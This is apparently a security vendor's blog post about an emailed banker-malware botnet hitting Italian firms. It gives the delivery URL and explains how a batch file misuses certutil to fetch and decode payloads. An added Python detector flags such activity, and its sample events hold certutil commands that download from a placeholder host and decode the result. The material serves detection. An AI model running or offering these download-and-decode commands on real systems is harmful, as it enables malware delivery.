The Italian Botnet Attacks
Cynet Detects the Mail Botnet That Has Been Hitting Italian Companies
The Cynet 360 holistic security platform successfully detects the latest botnet to hit Italian companies. The botnet arrives by way of a legitimate-looking email that appears to have been sent by the Italian Department of Treasury, using subjects such as “Codici Tributo Acconti” (Tribute Advocates Codes).
The attacker has chosen a subject that people are likely to fall for, as this subject line is used frequently within the framework of business administration. The e-mails, though, are sent from unknown addresses not related to the Italian Department of Treasury. Some of the reported addresses include: [email protected] or [email protected].
The mail has a link that opens the browser and downloads a JS file. The JS file then issues a GET request to 239outdoors.com/themes5.php to drop a file called 1t.exe on the host. The file (which looks like banker malware) is then executed by the JS and communicates with a CNC server, awaiting commands and sending the stolen credentials to the CNC. It also sends details of IPs, persistence, etc.
Additionally, the URL appears to drop another malicious threat, “Nuovo Documento 2008.” This is a .bat file that uses the “certutil for delivery of file” technique to drop and execute another file, which downloads an encoded payload. The technique is silent and does not raise red flags for suspicious activity. After decoding and running the payload unslaa.exe, it behaves the same as 1t.exe. The file also communicates with the same CNC server.
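The certutil download-and-decode behavior described above can be hunted in process-creation telemetry. The following is an added example, not Cynet's detection logic or code from the original page: the event field names, finding labels and sample events are assumptions constructed for illustration, loosely modeled on the fields of a Sysmon process-creation event.

```python
import re

# Real certutil options; grouping them into "fetch" and "decode" is this example's choice.
FETCH_FLAGS = {"urlcache", "verifyctl"}
DECODE_FLAGS = {"decode", "decodehex"}
SCRIPT_PARENTS = {"cmd.exe", "wscript.exe", "cscript.exe"}  # batch file or script host
FLAG_RE = re.compile(r"(?<!\S)[-/]([A-Za-z]+)")  # option token preceded by whitespace
URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return findings for one process-creation event (dict with assumed keys)."""
    # Check the PE original name too, so a renamed copy of certutil is still seen.
    names = {basename(event.get("image", "")), event.get("original_file_name", "").lower()}
    if "certutil.exe" not in names:
        return []
    cmd = event.get("command_line", "")
    flags = {f.lower() for f in FLAG_RE.findall(cmd)}
    findings = []
    if flags & FETCH_FLAGS and URL_RE.search(cmd):
        findings.append("remote-fetch")
    if flags & DECODE_FLAGS:
        findings.append("decode")
    if findings and basename(event.get("parent_image", "")) in SCRIPT_PARENTS:
        findings.append("script-parent")
    return findings


def triage(events):
    """Return (index, findings) for every event that produced at least one finding."""
    return [(i, f) for i, e in enumerate(events) if (f := classify(e))]


SYS32 = "C:\\Windows\\System32\\"
SAMPLE_EVENTS = [  # constructed sample data, not telemetry from this campaign
    {"image": SYS32 + "certutil.exe", "parent_image": SYS32 + "cmd.exe",
     "command_line": "certutil -urlcache -split -f http://example.invalid/p.txt p.txt"},
    {"image": SYS32 + "certutil.exe", "parent_image": SYS32 + "cmd.exe",
     "command_line": "certutil -decode p.txt p.bin"},
    {"image": SYS32 + "certutil.exe", "parent_image": SYS32 + "mmc.exe",
     "command_line": "certutil -store My"},  # routine certificate-store query
    {"image": "C:\\Users\\Public\\cu.exe", "original_file_name": "CertUtil.exe",
     "parent_image": SYS32 + "wscript.exe", "command_line": "cu.exe /decodehex a.hex a.bin"},
]

if __name__ == "__main__":
    for idx, findings in triage(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["command_line"], "->", findings)
```

A fetch followed shortly by a decode on the same host, both launched from a script or batch parent, is the pairing worth alerting on; either finding alone also occurs in legitimate administration.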
The Cynet 360 system detects and protects against these attacks. As part of best security practices, we recommend that together with utilizing a comprehensive security platform like Cynet, organizations educate employees to:
- Proceed cautiously with email attachments.
- Check carefully before clicking unfamiliar links in email messages.
Still have questions or want to know how Cynet 360 can help you protect your organization against botnets and other threats? Contact us: [email protected].